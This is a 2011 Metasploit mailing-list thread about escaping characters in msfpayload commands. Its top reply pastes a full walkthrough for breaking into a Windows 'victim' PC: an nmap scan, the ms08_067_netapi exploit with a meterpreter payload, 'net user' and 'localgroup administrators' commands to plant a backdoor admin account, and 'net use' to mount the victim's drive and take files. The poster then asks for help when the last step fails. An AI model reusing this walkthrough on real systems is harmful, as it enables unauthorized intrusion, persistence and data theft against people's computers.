mailing list archives
Re: Escape characters
From: ravindra kalal <itravin () gmail com>
Date: Fri, 1 Apr 2011 17:14:08 +0530
I have just started using metasploit, i have successfully hacked a pc with
the help from (N0F () T3, MinSteRexS), pls find the below instructions which i
We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O <target ip>
- If you see that ports 139 TCP and 445 TCP are open then everything is
exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the
- We choose the exploit “ms08_067_netapi” by writing “use
- Now we set RHOST to our victims ip: “set RHOST <target ip>”
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″
and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter
session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation
message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3
- You should see again the confirmation message saying: “The command
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3″ and hit
- If that doesn’t work type “net use X: \\<target ip>\C: mypass
/user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it
and enjoy the victim’s files.
i was successful in creating a user with local administrators right in
victims pc but when i am trying to map victims drive i am getting following
*C:\Documents and Settings\admin>net use R: \\172.16.20.93\c$ 123 () 456/user:suki
System error 5 has occurred.
Access is denied.
thanks and regards,
On Fri, Apr 1, 2011 at 1:07 PM, <danuxx () gmail com> wrote:
Then, You could try to use msfconsole instead and from there set the
Payload options, that will take care of it.
Sent via BlackBerry from Danux Network
From: Eric <dkn4a1 () gmail com>
Sender: framework-bounces () spool metasploit com
Date: Fri, 1 Apr 2011 12:52:49
To: Jose Selvi<jselvi () pentester es>
Cc: <framework () spool metasploit com>
Subject: Re: [framework] Escape characters
No. I'm not trying to encode the shellcode.
Suppose, I want to generate a payload executable with msfpayload for
windows/exec payload with parameter CMD=cmd /c start calc & start
In this case, obviously I need to escape spaces, \ and & characters, like
msfpayload windows/exec CMD=cmd\ \/c\ start\ calc\ \&\ start\ notepad
Likewise, which all character I need to escape to make it work perfectly
On Fri, Apr 1, 2011 at 12:36 PM, Jose Selvi <jselvi () pentester es> wrote:
MSFEncode is who encode the payload without badchars.
Badchars depends on wich vulnerability are you exploiting. Each
vulnerability has their own badchars so there isn't a single list of
universal badchars. Some of them are quite common like 0x00 (end of
but I think there isn't any universal list.
What vulnerability are you exploiting?
El 01/04/11 08:53, Eric escribió:
What all special characters should be escaped with msfpayload?
I believe< > ; : ' " / ( ) %&
Could I find documentation regarding this somewhere?
Thanks in advance.
Security Technical Consultant
CISA, CISSP, CNAP, GCIH, GPEN
SANS Mentor in Madrid (Spain). September 23 - November 25
SEC560: Network Penetration Testing and Ethical Hacking
*Thanks & Regards,